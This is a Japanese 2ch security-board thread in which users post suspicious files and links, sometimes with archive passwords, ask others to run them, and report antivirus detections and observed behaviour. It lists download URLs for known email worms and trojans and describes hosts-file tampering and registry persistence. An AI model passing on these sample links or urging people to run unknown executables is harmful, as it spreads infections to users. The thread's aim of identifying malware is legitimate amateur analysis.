すみません、URLを書くのを忘れました。

これです。
ttp://www.911tabs.com/bands/t/

意味が分からん。俺もよくそこ利用するけど勝手にDLなんてされないよ。
ポップアップはひたすら閉じてればいいだけど。

>>636
ありがとう。上記のメインページは問題なく検索先に問題が
あるか、何かを間違えてクリックしたのかも知れません。

up.uppple.com/src/up2551.jpg
トロイらしいんですが詳しくわかりますか？

ttp://up.uppple.com/src/up2551.jpg
もう消えてるから分からんｗ

>>639
トロイというか、何でもありのブラクラ系だな。
iframe 多数でどっかから、ウイルスとかスパイウェアと呼び込んでるかも。
後、mailto、telnet、FDDアタック、concon、無限ウィンドウオープン等々。
拡張子jpgだが、中身html。

http://www.filecroc.com/filecroc101.exe
インストールおねがい！

↓おねがい！

ttp://kissho1.xii.jp/7/src/7jyou1418.avi
これで変なタスクバーアイコンをゲットしました。

>>643
7jyou1418.avi - infected by Trojan.JS.WindowBomb.g

>>643
   1.文件名：7jyou1418.avi
   不是病毒

>>643
aviだと思って定義ファイル未更新のNorton2005で踏んだから死んだ。

>>641
TR/VB.WY.17@AntiVir PersonalEdition Classic

ttp://www.avira.com/en/threats/section/vdfhistory/vdf_no/6.38.00.67/6.38.00.67.html?term=TR/VB.WY.17

VDF6.38.00.67で対応したとか書いてあるけど、実際は6.38.00.66で検知できてる。
さすがドイツ！

>>647
filecrocってP2Pだろ。
実はトロイなの？

うちのantivir反応しねえぞ
vtではsunbeltのみ反応したけどsunbeltだからねえ…
http://www.virustotal.com/vt/en/resultadof?d676f0c6df3b4600b63a998c21e743c6

インスコする気にはならんけど

トップページには100% CLEAN NO SPYWARE、 NO ADWARE 、NO POPUPS て書いてある。

http://company-crime.myeweb.net

Aviraのアラートでまくるけど、それすり抜けてTelenetが外部にアクセス始めるは、
OEにアカウント作成してサーバに繋ごうとする。さらにPIFファイルまでDLしようとする。
((((;゜д゜)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ



ほんと？
ぁゃιぃhtmlを実行してみる勇者ｷﾎﾞﾝﾇ

トップページには何も無い
落としてメモ帳ででも中身見てみろ

有害なのはこっち
悪意のあるサイトを適当に呼び出す
company-crime.myeweb.net/window_dressing/

＞それすり抜けてTelenetが外部にアクセス始めるは、OEにアカウント〜
↓を呼び出すため
www.hellplant.org/cgi-bin/xoor/serpent.cgi

＞さらにPIFファイルまでDLしようとする
www.abisource.com/mailinglists/abiword-dev/2005/Jun/att-0006/phone_number2.pif
「Email-Worm.Win32.NetSky.t」
seti.sentry.net/archive/bioastro/2003/Feb/att-0025/Document003.pif
「Email-Worm.Win32.Sobig.a」
lists.w3.org/Archives/Public/site-comments/2003Aug/att-0008/movie0045.pif
「Email-Worm.Win32.Sobig.f」
lists.suse.com/archive/suse-sparc/2004-Jan/att-0009/message.pif
「Email-Worm.Win32.Mydoom.a」
lists.w3.org/Archives/Public/www-dom/2001OctDec/att-0204/sensitive.pif
「Email-Worm.Win32.Magistr.b」
等など以下略

.pifってめずらしいな
拡張子表示されないんだっけ

>>651
今いってみたら何も残っていなかったわけだが

>>652
ウィルスのオンパレードだ((((；ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
でも有名どころだから対応はしてると思うけど。

>>651
最近は、日本でも海外でも独自のドメインも簡単にとれて、サーバーも手軽に借りれるから、
ものの1時間もあれば、別のURLでまた出現するかも。

ttp://xtp0001.s3.x-beat.com/cgi-bin/up/source/Sonata_21789.jpg

これも色々読み込まれるっぽい

>>657
紫だからすでに踏んでた＾＾；

-- 「2007/03/18 10:58」のキャッシュをチェックしています。 --
※このアドレスは危険URLのひとつです。
注意！ループタグを発見！ (1)
注意！逃げウィンドウを発見！ (1)
ブラクラチェックが終了しました。

※ ジャンプタグを発見しました。(1)
※ このページは自動的にリロードされるようです。
※ windowオープンを発見しました。(5)
※ プラグインデータを発見しました。(1)
http://www.thepocket.com/wavs/moneypit3.wav
※ インラインフレームタグを発見しました。 (134)
http://anycracks.com/
http://www.kuronowish.net/links/
http://blueslyrics.tripod.com/artistswithsongs/gary_moore_1.htm
http://www.geocities.com/fuzoku_ou/index.htm
http://www.matureobsesion.com/indexnc.php
※ 隠しスクリプトを発見しました。(1)
http://x8.ninpou.jp/ufo/109915201
上記アドレスのチェックもお勧めします。(そのままチェックできます。)
※ 注意！一部タグが大量に使われています。
[このアドレスの安全度 0%]

>>657
ウイルスいっぱい
鑑定スレでさんざん既出

　　　　　　　　　　　 _|_
　　　　　　　　　　／＿＼
　　　　　　　　　　￣|Ｕ￣　　
　　　∧＿∧　　　 /ミヽ、　
　　　(　･ω･)　　ノﾐｼ三　`~ﾟ
　　　(っ　≡つ＝つﾟ　　ﾟ　
　　　./　　　) ﾊﾞﾊﾞﾊﾞﾊﾞ
　　　( /￣∪

　　　　　　　　　　　 _|_
　　　　　　　　　　／＿＼
　　ﾋｭﾝ　　　　　 ￣|Ｕ￣　　
　∧＿∧　＿∧　 /ミヽ、　
(（(　･ω･)三ω･) ノ ヽ　 `~ﾟ　））
　　(_っっ=　_っっﾟ　　　ﾟ　
　　　ヽ　　　ノ ﾋｭﾝ
　　　( /￣∪

http://doiob.net/doiob/uploader/src/up1166.zip

ブログ版をPDFファイルにしてみました。
縦書きにしています。
Adobe Readerで読んでください。

いきなり不足してるフォントをダウンロードに行きますので、
慌てないでください。

＊＊＊＊＊＊＊＊＊＊＊＊

これ、何度か見かけたのだが
あからさまに怪しいが自分で解凍する勇気は無い

>>661
403ですよー

過疎ってるな

Winnyを狙ったワーム・ニュイルス情報 Part60
ttp://tmp6.2ch.net/test/read.cgi/download/1170937127/534
にあがってた未検知ファイルをAntiVirに送ってたんだけど、
2msn.exeだけ

The file '2msn.exe' has been determined to be 'CLEAN'.
Our analysts did not discovered any malicious content.
と言われた

3/10時点でのvirustotalのSSは、
ttp://up.uppple.com/src/up2585.png

俺の環境では、踏む気になれないので、勇気のある人(?)実行たのむ
ttp://up.uppple.com/upload.cgi?mode=dl&file=2584
vip

なんも起きんかった
実行ファイルの挙動や動作のログを取ってくれるツールってなかったっけ？
どこにファイル追加した、とかここのレジストリいじった、とか
あまりにも使わないんでどっかいってしまった

>>665
砂箱のことか？

>>666
ファイルの実行それ自体を阻止するとかじゃなくて、ただ挙動を調べるだけ
確かそのツールをかまして起動させるような感じだった
そんなSandBoxあった？

Total Uninstall とか かな
ttp://cowscorpion.com/Registry/totaluninstall.html

この手のやつは得られる情報が多すぎて
中々しっくりくる物が見つからなくて困ってる

>>665 thx
Backdoor Trojan Downloader ってのは誤検出で
Aviraのanalystsが正しいってことでおｋ(？)かな
そもそも、うｐ主が何のファイルを上げていたのかも分からないが…(^^

>>668
そか、これでも一応できるか
前に利用してたのはインストール不要でもっちょっと軽かった
少し思い出して探してみるわ

**雑音**

* INTEL製品を頼まれもしないのに擁護/ﾏﾝｾｰしライバル製品を攻撃する
* 主にAMD製CPU叩きとNOD32及びPestPatrol以外のソフト叩きに異様に執着
* セキュ板、自作PC、PC一般、DTV板、情報システム板、まれにﾌﾟﾛｸﾞﾗﾏ板などに出没
* Ｃ言語プログラミングはおろかSIMD(MMX,SSEなどの処理系)をSIMMと書き続け、 超超超初級
プログラム問題さえも解けない、完全なプログラミング素人
* BlackIc、Prescotte、シンプルオブベスト、チッンボチップ、骨髄反射、MEMTEST86+で/onecpu、OutLock、ゴミグス、アントネトバ、ｸｱｯﾄﾞPU、ニーと、低商品電力、95umから65umにシュリンク、風評努力など想像を絶する間違いを犯す。
　結論：頭がおかしい。
* ある自分の無知を晒して以来名無し、別コテで自作自演
* 虫を必死に連呼（連呼するのが雑音なのでわかりやすい）

ttp://z-temp.hp.infoseek.co.jp/2ch/Prescott699-.html
ttp://66.102.7.104/search?q=cache:yFC7aJM6xCgJ:l-lab.org/pukiwiki/pukiwiki.php

近況や出没情報はこちらに

【動機は？】雑音犬畜生Part37【●持ち】
http://tmp6.2ch.net/test/read.cgi/tubo/1167055200/

一日中、目が開いてる間ずっと、自分じゃロクに買いもしない
Intelを讃えてAMDを敵視し、自演と自滅の繰り返し・・・

ホント、そろそろ本当の“動機”を語ってほしいぞ。
よっぽどの、恨みつらみがあるんだろうから。

逆恨みなのは、もうみんな分ってるけどねw

ここで自分の使っているアンチウイルスの検出力をテストせよ
http://pc11.2ch.net/test/read.cgi/sec/1174461579/

バカが自分勝手に遊んでるだけで調査になってない
検出力などAV-ComparativesやVB100%のような専門機関がスレ結果だけで十分

あーあ、スレ結果だって、する結果だ
まぁそもそも実行するスレと何の関係もないんで、下らないスレ貼るなよ

>>674
セキュリティ板の各スレに手当たり次第に書き込んでいるだけの
かわいそうな人なので、やさしく放っておいてあげて下さい

http://www.dotup.org/uploda/www.dotup.org6925.zip.html
p:virus

ウイルスでしょうか

あっちのスレの連中に聞け

つttp://2ch-news.net/up/up53900.png
マイナーばかりが、検出
なんか、ぁゃιぃ…

>>676
実行したらexeファイルに感染しまくり

C:\WINDOWS\System32\BASSMOD.dllけしとけ

>>679
kwsk

http://www.abisource.com/mailinglists/abiword-dev/2005/Jun/att-0006/phone_number2.pif
http://www.cumsshut.com/
http://sakuratan.ddo.jp/uploader/source/date35978.lzh

3つめはスキャンしないほうが良い

これは大丈夫でしょうか？

http://imepita.jp/20070313/664490

>>684
スレ違い

勇気が無くて見られない画像解説スレ Part845
http://etc6.2ch.net/test/read.cgi/entrance/1175217796/

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
のRunがなくてExplorerなんだけどどうしたらいいんでしょうか

>>686
スレ違い

【ｴｽﾊﾟｰ】超初心者の質問に答えるスレ458【ﾏﾂﾞﾚｽ】
http://pc11.2ch.net/test/read.cgi/pc/1175587830/

某所で拾ったファイル（元名-ジャケット（長い空白）.exe）
virustotalの結果は、どこも検知しなかった
実行お願いします
ttp://2ch-news.net/up/up55312.png
ttp://2ch-news.net/up/up55310.zip.html
vip

tempになにやら.batを追加

>>689 thanxです
どこも検知せずフォルダアイコン・空白.exeだったんで
新種か？と思ったんですが、PCには影響なさそうですか？
失敗ウイルスか何かでしょうかね？

Filename Result
jacket.exe MALWARE

The file 'jacket.exe' has been determined to be 'MALWARE'. Our analysts discovered that the file is a Trojan.
In general this kind of programs contains harmful functionality called payload.
Detection will be added to our virus definition file (VDF) with one of the next updates.

by　AVIRA

jacket.exeを実行して作られるファイルは下記
:C:\Documents and Settings\Owner\Recent\jacket.lnk
:C:\Documents and Settings\Owner\Recent\ジャケット_001.jpg.lnk
:C:\WINDOWS\Prefetch\JACKET.EXE-2C51C580.pf

あとはレジストリの HKEY_CURRENT_USE に Cache が作られるだけ。

女の子のジャケット画像が出てくるだけです。
システムやレジの重要な部分には一切触れません。
PC無害です。

>>691
直踏み検証結果ですか？

んや
実行めんどいんでAVIRAにおくっただけ

Winny.exeやらどっかの掲示板のURLやらが書かれているから
暴露か自動書き込み関係と思ったけど

作成者の意図通りに動作してないのかも

AVIRAでペイロードを検出したみたいですから
694ｻﾝの言うとおりで 作成者の意図通りに動作してないのでしょうね。
一応 通信もNEGiESで見たんですけど特に目立った通信は無いようです。
何度踏んでも>>692の結果です。

>>691 thanx
今メール見たら、Aviraから返事が来てました
こんなに速く来るのは珍しいので驚いてます
>>半角の鑑定人さん
検証 thanxです
>>694
>作成者の意図通りに動作してないのかも
やはり、そんな感じもしますが
一応、皆さんお気をつけてください

お気を付けもなにもこんなもん踏みようがねえよ

>>664
ダウンロード後に出るDriveCleanerの詐欺広告のほうがウザス

>>688
送信日時 : 2007年4月6日 21:07:20
Hello.
New malicious software was found in the attached file
(Email-Flooder.Win32.Agent.e).

by かすぺ

実行して検証しただけじゃ完全に挙動把握できるわけじゃない
ポリモーフイック型なんかだとカスペラボでも解析に1週間はかかるんだとさ

http://kissho.xii.jp/1/src/1jyou3143.avi

偽装ぽいので鑑定よろ

鑑定スレへどうぞ

>>703
鑑定スレじゃ詳しくは判明しなかったので…
マルチぽいですが是非お願いしたいのです。

>>704
転載

ウイルス&男の笑い声でした
AVGで以下を検出
Exｐｌoit.wmfが3つ
Exｐｌoit.aniが2つ
トロイ色々が4つ
スクリプトウイルスが1つ
PC有害　

Loveletterて・・・懐かしすぎ。

過疎りすぎw

∧＿∧
( ´･ω･)
( つ旦O
と＿)＿)

2chCloserってどーよ
ttp://www16.plala.or.jp/spichilz/soft13.html

>>709
暇だったんで実行してみようかなとﾀﾞｳｿしてみたら
2chCloser.exeを ｶｽﾍﾟがTrojan.Win32.Delf.abeとして検知。
多分 トロイと同じ様な動きをするんだろな

>>710
俺もｶｽﾍﾟだから反応したけど、微妙だね……。
ttp://ehoba.mydns.jp/loada/src2/tfxup0334.png

>>711
ｶｽﾍﾟを遮断して実行してみた。
hostsファイルの改ざんがありますね。
あとは 2chCloserを起動監視した状態でタスクマネージャで強制終了させても
自分自身のコピーが復活します。
ここでカスペを実行させると Trojan.Win32.Qhost.leとBackdoor.Win32.Agent.anfを検知しました。
山田オルタナティブの亜種との事。どうもservise.exeが同じ様な働きをするみたいですね。

フォルダが2chになってる場所も開くと問答無用で閉じるｗ
オプションの監視対象に、レジストリエディタ、タスクマネージャ、システム構成ユーティリティも
ttp://up.uppple.com/src/up3215.png


全てのオプションをチェックした状態の2chCloserと改変されたhostファイル
ttp://up.uppple.com/upload.cgi?mode=dl&file=3216
DLKey:2ch

ﾀﾞｳﾝﾛｰﾄﾞしてみました。
「host 10KB」ファイルはWindowsのHOSTSファイルを改変します。
その結果 2ｃｈ関係がが「localhost」への接続になり、接続できなくなります。
以下が、改変されるアドレス(全リストははるかに長くなります)の例があります。
127.0.0.1 2ch.net
127.0.0.1 www.2ch.net
127.0.0.1 www2.2ch.net
127.0.0.1 www2b.2ch.net
127.0.0.1 www2f1.2ch.net

このhostsファイルはTrojan.Win32.Qhostの亜種( .le)としてｶｽﾍﾟﾙｽｷｰが検知しました。
ですが 接続を拒否するために使用するのであれば無害なファイルです。

　　　ｼｭﾎﾞｯ 　　　　　　　　キャノン版(笑)もうやだ・・・
　　　　　　　.,　∧＿∧
　　　　　　[]() （・ω・｀ ）　　　　　　ｌ二ヽ
　　　　 　　□と　　　　）￣⊃　　　　　) )
　　　　　　⊂ （＿（＿つ　　￣⊃　　/￣￣￣ヽ
　　　　　　　⊂_　　　　　 .＿⊃　　　| （＼／） |
　　　　　　　　　⊂＿＿⊃.　　　　　 |　 >　< 　|
　　　　　　　　　　　　　　　　　　　　 | （／＼）. |
　　　　　　　　　　　　　　　　　　　　 ヽ＿＿＿/

winpt42n_7C6C6C0F.dll
という１ｋのファイルがsystem32に作られてたんだけど、何これ？

434 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2007/04/29(日) 01:59:08
勇者さんいますか？
いたらお仕事ですwww

124 名前：萌える名無し画像[sage masami] 投稿日：2007/04/28(土) 22:46:26 ID:sWFHMRli0
http://kissho.sytes.net/5000zz/upload.cgi?mode=dl&file=4661

　↑
これウィルスですか？
それとも単なるaviファイル？
意味分からんですと

http://pie.bbspink.com/test/read.cgi/girls/1177489031/124-
http://etc6.2ch.net/test/read.cgi/qa/1176034702/724


因みにノートン入れてるPCは反応する

解凍すると「新しいフォルダ」「新しいフォルダ2」を作成

「新しいフォルダ」
・「[CM] ロッテ ガーナミルクチョコレート（母の日宣言07篇） 60秒.avi」 CM動画。無害
・Thumbs.db 無害

「新しいフォルダ2」
・test.exe Trojan.Win32.Haradong.ap

原田さんｷﾀ━━━━━(ﾟ∀ﾟ)━━━━━ !!!!!

これ、ここ二〜三日格スレに貼られたらき☆すたウイルスじゃない?

原田の方のみ
ttp://www.uploda.org/uporg790984.zip.html
DL：harada

実行したい人、各所に通報したい人どぞ

追記

「test.exe」
サイズ 147,456
MD5 bb9b7e71bf62fdd81d63fdc46dca6247

>>718
これはカスペで引っかかったのかな?

>>723
カスペ（及びカスペエンジンのアンチウイルス）
落とした時には既に対応していたから、誰か通報したんじゃないかな

シマンテックは最初からかな

ここか？

何が?

http://www.virustotal.com/
ここでスキャンしても、”es mayor”としか表示されません。
どうしてでしょう。　何回やっても同じです。

何が?

>>727
容量オーバーじゃね？

保守っ

　　　　　　　*'``・* 。
　　　　　　　　|　　　　 `*。
　　　　 　　,｡∩Ａ＿Ａ　 ＿*
　　　　　　+　(o・ _ ・o)/∠ +ﾟ
　　　　　　`*｡ ヽ、　 つ／*ﾟ*　みんな集まれ〜
　　　　　　　`・+｡*・' ﾟ⊃　+ﾟ
　　　　　　　☆　　 ∪~ ｡*ﾟ
　 　　　　　　`・+｡*・ ﾟ

もうどうにでもな〜れ　　　　　　　　　　　　　　　　　　　　もうどうにでもな〜れ
　もうどうにでもな〜れ　　　　　　　　　　　　　　　　　　もうどうにでもな〜れ
　　もうどうにでもな〜れ　　　　　　　　　　　　　　　　もうどうにでもな〜れ
　　　もうどうにでもな〜れ　　　　　　　　　　　　　　もうどうにでもな〜れ
　　　　もうどうにでもな〜れ　　　　　　　　　　　　もうどうにでもな〜れ
　　　　　もうどうにでもな〜れ　　　　　　　　　　もうどうにでもな〜れ
　　　　　　もうどうにでもな〜れ　　　　　　　　もうどうにでもな〜れ
　　　　　　　もうどうにでもな〜れ　　　　　　もうどうにでもな〜れ
　　　　　　　　　　　　　　　　　　　　*'``・* 。
　　　　　　　　　　　　　　　　　　　　|　　　　 `*
もうどうにでもな〜れ　　 　　,｡∩∧_∧　 　*　.　　　もうどうにでもな〜れ
もうどうにでもな〜れ　　　　+　(´･ω･`)　*｡+ﾟ 　　　もうどうにでもな〜れ
もうどうにでもな〜れ　　　　`*｡ ヽ、　 つ *ﾟ*　　　　もうどうにでもな〜れ
　　　　　　　　　　　　　　　　　　　`・+｡*・' ﾟ⊃ +ﾟ
　　　　　　　　　　　　　　　　　　　☆　　 ∪~ ｡*ﾟ
　　　　　　　　　　　　　 　　　　　　`・+｡*・ ﾟ
　　　　　　　もうどうにでもな〜れ　　　　　　もうどうにでもな〜れ
　　　　　　もうどうにでもな〜れ　　　　　　　　もうどうにでもな〜れ
　　　　　もうどうにでもな〜れ　　　　　　　　　　もうどうにでもな〜れ
　　　　もうどうにでもな〜れ　　　　　　　　　　　　もうどうにでもな〜れ
　　　もうどうにでもな〜れ　　　　　　　　　　　　　　もうどうにでもな〜れ
　　もうどうにでもな〜れ　　　　　　　　　　　　　　　　もうどうにでもな〜れ
　もうどうにでもな〜れ　　　　　　　　　　　　　　　　　　もうどうにでもな〜れ
もうどうにでもな〜れ　　　　　　　　　　　　　　　　　　　　もうどうにでもな〜れ

人いますか？
お暇な方お願いします。Registry Repair Doctorなるソフトです。
ttp://www.malwaresweeper.com/download/msrd.exe
他怪しいものが沢山と配布されてるみたいですが
ttp://www.malwaresweeper.com/download.html

よろしくおね

　　　　　　∧_∧
　　　　　（´・ω・） ＜ ほしゅ
　　　　　（　O┬O　　　　きこきこ〜〜〜
　　　　◎-∪'┴◎

このスレも過疎スレに…
ここから拾ってきて実行すればＯＫｗ

【信者】検出可否報告スレ2【禁止】
http://pc11.2ch.net/test/read.cgi/sec/1177848342/

自分で新種見つけて、実行してるからなぁ……

>>734
このスレはNOD厨の自演

>>736
>>736
>>736
>>736
>>736
>>736
>>736
>>736

ageますよ

あげ保守

インスコマンは今何処…

あげとこ〜

自分はZERO使っています。
ここのスレに書かれているアドレスを踏むのは無謀ですか？

PHSかと思った。

(^Д^)ｱｹﾞ〜

落とさないよ〜

(^Д^)ｱｹﾞ〜

最近インスコマン来てないの？

最近セキュ版自体見てなかった｡

つ[ ttp://vaxobjectsetup.com/download.php?id=4080 ]

苺５　xs3133　おまけ.exe

404ですた

ttp://www.seagate.com/support/discwizard/DiscWizardSetup.jp.exe

>>751
404ですた

>>751
File Not Found (404)

苺５　xs3136　おまけ.exe

とりあえずｴﾛﾏﾝｶﾞの方だけいただいて
あからさまにあやしいおまけ.exeはそのままごみ箱に捨てた

＞おまけ.exe

ﾜﾛﾀｗ

抜き終わったのでいらないPCで実行した
素人なので細かい挙動とかわからないです

レジストリ追加
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DoFOcyjN"="C:\\WINDOWS\\$NtUninstallKB918118$\\spuninst:DoFOcyjN.exe"

ファイル作成
C:\WINDOWS\$NtUninstallKB918118$\spuninst:DoFOcyjN.exe ?
C:\WINDOWS\$NtUninstallKB900485$\spuninst\xNrFtyhG.dll
作成されるファイル名ランダムかも

・DoFOcyjN.exe
プロセスに現れるもののエクスプローラから見えないのでいじれなかった。常駐有
・xNrFtyhG.dll
ttp://www.uploda.org/uporg894963.zip.html virus
Borland Delphi DLL おまけ.exe本体と大体同じ？

当環境では実行した瞬間からエクスプローラが重すぎて挙動不審なのでまともにPC操作できんとです
文字列見た印象では掲示板爆撃のように思えるけど、FWは特に何も言わなかった
ちゃんと動いているのか動いていないのか…

http://raus.de/crashme/
よろ

ブラクラかよ

http://23153.gandefinkionladesun.com/pic_collection/

しばらく会話のなかったメッセの知り合いがいきなりこのアドだけ
伝えてきた…クリックしたらインストール警告画面。
知り合いはもうログアウトしちまったし…こえーよ；

あ、インスト警告じゃなかった。
でもやっぱこえー；

その知り合いがメッセンジャーのスパムで自己増殖するワームかなんかに感染しちゃってるんだろ。
教えてやれ。

>>762
まじか…そんなスパムがあるとは知らなかった
しかし、ログインしてもメッセ到着しないんだよな、なぜか
それもスパムのせいなのかね
さてどうやって伝えるか…

WarezovとかStrationとか呼ばれている奴だな

age

　　　　 ,ﾊ,,,ﾊ
　　　　(,,･ω･)　　ｷｰｺｷｺ
　〜 　｡(_ ﾟTﾟ
.　　　 　ﾟ￣ﾟ

和んだ

苺70　bh3744　keyもpassも　　kamo

愚弟が愚友から提供(CDRで）を受けて何も考えずクリック。
ファイルは典型的な　「偽ファイル名.（　空　白　）.exe」型が４ヶ。
ただノートン、マカフィともに無反応でスルー。新種？それとも出来損ないファイル？
感染（？）機をネット遮断して起動させてみたもののさしあたり特別な挙動はないかんじだが。

説教で終わらすにしろ、再インスコさせるにしろ、挙動がわかれば嬉しいです。

つ　http://research.sunbelt-software.com/submit.aspx

うｐが無いんではどうしようも

>>768
すべてのファイルを実行したんだとすると危険だったような
単一ファイルじゃなにもおきないタイプだったと思う

>>768
readme.txt .exe だけ反応した。
ttp://www.virustotal.com/resultado.html?0b4d624178bb84b81be1a99a413f896b

>>771>>772
ありがとう。１つクリックしただけみたいなので、説教の上
残存価額支払いまではPCリビング固定の刑に処することにするよ。

あやしいファイル実行するのって一つの趣味？

と研究だろ

履歴書に書いてもおｋ

貼っておきますね

563 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：2007/08/16(木) 04:18:49 ID:YvGrkCHp0
本当はこっちに書きたかったんですけど
アクセス規制されててかけないので
こちらに書かせて頂きますm(__)m

あやしいファイルを実行するスレ
http://pc11.2ch.net/test/read.cgi/sec/1140517079/

スレ違いで申し訳ないんですが
コイツがあやしいのです
ttp://a-draw.com/contents/uploader3/src/up0105.lzh.html

pass：deepp

mp3なんですけど、右クリックするとそのまま固まるんです
情報をポップアップしようとするとフォルダが閉じるし
単に壊れてるファイルなんでしょうか？

>>777
特に問題ない。
mp3infopとか、右クリックで表示されるメニューの中のどれかのソフトが問題なんじゃない?

>>777
ロダの仕様なのかブラウザ経由だと壊れた書庫の状態で落ちてきた
解凍前にファイルサイズが合ってるか確認すれ

中身は同じく問題無し

http://www6.uploader.jp/dl/cjhs84/cjhs84_uljp00107.zip.html

実行お願いします

チーターは巣に帰れ。

http://11731.kit.carpediem.fr/BT-Bukkake.exe

>782
アプリケーションの新規ファイル作成時にイベントが発生しました
C:\Program Files\Mozilla Firefox\firefox.exe.
ファイルは隔離されましたESET社へファイルを提出してください

ttp://www7.uploader.jp/dl/maru/maru_uljp00061.jpg.html

ポルノウェア
not-a-virus:Porn-Dialer.Win32.CapreDeam.p

鑑定スレじゃないんだから、実行しろよ。
インスコマーーーーン!!

>>783
なんかマカヒーが常駐してるみたいなんだけど
違うかな・・・

訂正
SiteAdvisorか

このスレ埋めないか

過疎スレ埋め

過疎スレ埋め

今度なんかもってきていいですか？

だが断る

無料常駐系のオススメって何かある？
前までPestPatrol2005入れてたんだけど、この度OS再インスコで消えてもーた
もう本家では配布してないし
どうしよう

>>793
またお前か

>>794
無料常駐系のオススメって何かある？
前までPestPatrol2005入れてたんだけど、この度OS再インスコで消えてもーた
もう本家では配布してないし
どうしよう

>>795
無料常駐系のオススメって何かある？
前までPestPatrol2005入れてたんだけど、この度OS再インスコで消えてもーた
もう本家では配布してないし
どうしよう

>>796
無料常駐系のオススメって何かある？
前までPestPatrol2005入れてたんだけど、この度OS再インスコで消えてもーた
もう本家では配布してないし
どうしよう

そういや、NOD厨はPestPatrol信者も兼ねていたね。

http://www.uploda.net/cgi/uploader1/index.php?file_id=0000257485.exe

実行してしまいました。
何が起こるか教えてください。

実行したならわかるだろ?

ﾜﾛﾀ

埋め

http://www11.axfc.net/uploader/20/so/He_40143.rar.html

変わりに実行してもらえませんか？　ｐｗ　sfdx

Trojan.Win32.KillWin
\windows\system32\hal.dll を削除してシャットダウン実行。

dr.webのリンクチェッカーでここに出てきたサイト
チェックしたけど全部CLEANとかなるんですけど？
これってDr.WEBが代わりにそのリンクにつないで
ウイルスがあるかないかチェックしてるんじゃないの？

>>804 有難うございます！あぶなかった！

>>803
>>781

アンチウイルスソフト反応なし。
ttp://upload2.dyndns.org/up/4/_/jump/1191704740.zip/attatch
pass お借り致します


よろしくです〜

>>808
ttp://www.virustotal.com/resultado.html?e2b091f83e3f7a6bf1e6fb788b727a9b
Result: 0/32 (0%)

>>808
セキュ版は高校生と中学生しかいないから実行出来るような強者はいないよ
AA貼るくらいしか出来ないから

スクラップしておかないとな

そうなのかｗ
確かにろくな書き込みがないｗｗ
セキュリティ板使えねーｗｗｗｗ

ビビって実行も出来ない人間に使っていただく板でもありませんし

スペシャルフォースのチートばっかだしな。

ログ読み終えた感想。
インスコマン素敵。抱かれたい。

ここは鑑定スレじゃないってのに

いいえ。鑑定スレです。

鑑定しか出来ないやつしかいないから仕方ない。
Virtual PCとか使ってるやついないの？
ここ↓
http://www.microsoft.com/downloads/details.aspx?FamilyId=21EABB90-958F-4B64-B5F1-73D0A413C8EF&displaylang=en
でIE test用で無料公開されてるXPダウソしてVirtual PCで動かせば
誰でも仮想環境手に入るよ。Windowsの更新は出来んけど感染実験は
普通に出来るから問題ない

情報少なすぎて踏む気がしない

NTTのセキュリティー対策ソフトが2008になるのはいつごろ？

プロバイダ板で聞けよ

>>818
お前が導入して鑑定しろ。
VMware持ってるけど面倒くせえ。
とりわけ>>808に関しては実行する価値が皆無。

PC余ってるけど使う気しないんだよな。まさかの時の為に金くれるって言うなら実行してやってもいいけど。
それよりもまだアングラ(死語）気取りの厨房がいるって事自体に驚きだｗｗ

どうすればここ盛り上がるんだ？

別に盛り上げる必要とかないから

なんでだよ・・・
思い出とかつくりてぇじゃねぇかよ！！
お前らこれでいいのかよっ！

だってもう夏は終わったし

>>825
お前文化祭行かないタイプだな

ttp://www3.uploader.jp/dl/akaiup/akaiup_uljp01343.zip.html
うｐろだで見つけて興味本位でダブルクリックしてみたんですが、何もおきませんでした。
ノートンやVirusTotalでも反応無しです。
ただ、起動したときに一瞬だけコマンドプロンプトが起動したようなしなかったような。
結局何かわからずじまいなので、どういったものかわかる方がいればお願いします。

↑PASSWDくらい書けこのカスｗ

すみません、パスはfurutinです。

デカ過ぎて解析する気にならん。

残念。
今のとこPCに問題は出てないんですよね・・・。なんなんだろ

C:\Windows\winhttp.dllにアクセスして何かするみたいだけど
俺のパソコンにwinhttp.dllが存在しないので、そのまま何もしないで終了したっぽい

>>834
ありがとう。
ＰＣ内の個人情報送るとかそういう類のモノかもしれないですね

ttp://cowscorpion.com/dl/x264.html
これの一番上をおねがいします。

>>836
ただのコーデックじゃん

ttp://2up.pgrup.net/uploader/download/1197306644.zip
お願いします

>>838
ttp://www.virustotal.com/jp/resultado.html?2c4553a9d5f04ba3892a7f56cacb8dc8

>>839
すいません。
ファイルを受理中となるだけでよく分かりません。
どういうことなんでしょうか？

ttp://zenyrskin.innori.com/attachment/gk3.zip
なんでしょうコレ

何このスレ
ウィルス集めに最適じゃんお前らお疲れ様です

http://ktkr.vip2ch.com/upload.cgi?mode=dl&file=16595

鑑定お願いします
ファイル名:svchot.exe
圧縮してあります
容量　11.6MB
発見場所
C:\WINDOWS\SYSTEM32\MICROSOFT

とっても不安ですorz

ﾀﾞｳｿできねえよ？

というかなんで、そんなファイルﾀﾞｳｿしようとしたの？
「発見場所」って、winユーザーでそのファイルが無い人は
多分居ないよ。

正規のsvchost.exeはその1つ上のディレクトリにあるもののはずだが
つまりsvchost.exeを偽装したウィルスの可能性は十分ある

ttp://tweak-ui-powertoy.jp.brothersoft.com/download/
ここからDownloadできるTweak UI のインチキくさいセットアップファイル

>>847
変なサイトを経由してはいるが、最終的に手に入るバイナリは
マイクロソフトのサイトにおいてあるしデジタル署名もついている

ﾎｯｼｭ

http://www.uploader.jp/dl/oklsslv2ym/oklsslv2ym_uljp00068.zip.html

パスabcde

pornoplayersetupexe

海外の闇のアダルト業界が総力を結集して開発した
ポルノメディアプレイヤー
アンチウイルスソフトではスパイウエアとして検知される

参考URL
http://www.shareedge.com/spywareguide/product_show.php?id=3582

>>850
http://www.virustotal.com/analisis/baa35c4fbd394b9e1f377ed395851cb0

これ、最後に出てくるMP3ってFlashか

…exe全然関係ﾅｽｗｗｗ



ところでポルノどこ？(バーボン風

http://enjoi.blogdns.net/up/src/2302.lzh

たぶん、どっかから拾ってきたフラゲをexeにして、
アドウェア２個と抱き合わせにしたやつぽい
フラだけ抽出して圧縮したら、330KBになった

アドウェアは明日からのんびり覗いてみる

